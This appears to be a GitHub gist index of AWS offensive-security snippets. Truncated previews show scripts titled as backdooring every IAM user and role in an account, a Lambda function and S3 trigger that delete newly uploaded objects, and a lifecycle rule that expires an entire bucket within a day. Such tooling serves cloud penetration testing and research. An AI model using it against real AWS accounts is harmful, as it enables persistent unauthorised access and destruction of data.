Daniel Grzelak dagrz
dagrz
/ Backdoor all users in AWS account
Last active
August 17, 2016 01:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import boto3 | |
| from botocore.exceptions import ClientError | |
| import json | |
| def main(args): | |
| backdoor_users(get_users()) |
dagrz
/ AWS cli proxy Lambda function
Last active
June 18, 2016 00:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import awscli | |
| import awscli.clidriver | |
| from cStringIO import StringIO | |
| import sys | |
| import json | |
dagrz
/ Backdoor all roles in AWS account
Last active
December 30, 2019 16:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import boto3 | |
| import json | |
| import random | |
| # A list of Role, User, and account ARNs to allow | |
| # assumption from at random. | |
| BACKDOOR_ROLES = [ | |
| 'your-arn-here' |
dagrz
/ s3 bucket delete lifecycle configuration
Created
June 5, 2016 10:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Rules": [ | |
| { | |
| "Status": "Enabled", | |
| "Prefix": "", | |
| "Expiration": { | |
| "Days": 1 | |
| }, | |
| "ID": "Rule for the Entire Bucket" | |
| } |
dagrz
/ IAM lambda s3 delete policy
Created
June 5, 2016 04:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Effect": "Allow", | |
| "Action": [ | |
| "logs:CreateLogGroup", | |
| "logs:CreateLogStream", | |
| "logs:PutLogEvents" | |
| ], |
dagrz
/ IAM assume by lambda policy
Created
June 5, 2016 04:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Effect": "Allow", | |
| "Principal": { | |
| "Service": "lambda.amazonaws.com" | |
| }, | |
| "Action": "sts:AssumeRole" | |
| } |
dagrz
/ S3 bucket put notification configuration
Last active
June 5, 2016 04:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "LambdaFunctionConfigurations": [ | |
| { | |
| "LambdaFunctionArn": "arn:aws:lambda:[my-region]:[account-id]:function:[my-function]", | |
| "Id": "[my-guid]", | |
| "Events": [ | |
| "s3:ObjectCreated:*" | |
| ] | |
| } | |
| ] |
dagrz
/ Lambda s3 delete function
Created
June 2, 2016 13:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import urllib | |
| import boto3 | |
| s3 = boto3.client('s3') | |
| def lambda_handler(event, context): | |
| bucket = event['Records'][0]['s3']['bucket']['name'] | |
| key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8') | |
| try: |
dagrz
/ Cloudtrail s3 bucket acl
Created
June 1, 2016 12:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Owner": { | |
| "DisplayName": "[user-name]", | |
| "ID": "[user-id]" | |
| }, | |
| "Grants": [ | |
| { | |
| "Grantee": { | |
| "Type": "CanonicalUser", | |
| "DisplayName": "[user-name]", |
dagrz
/ Cloudtrail s3 bucket policy
Created
June 1, 2016 11:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version":"2012-10-17", | |
| "Statement":[ | |
| { | |
| "Sid":"AWSCloudTrailAclCheck20150319", | |
| "Effect":"Allow", | |
| "Principal":{ | |
| "Service":"cloudtrail.amazonaws.com" | |
| }, | |
| "Action":"s3:GetBucketAcl", |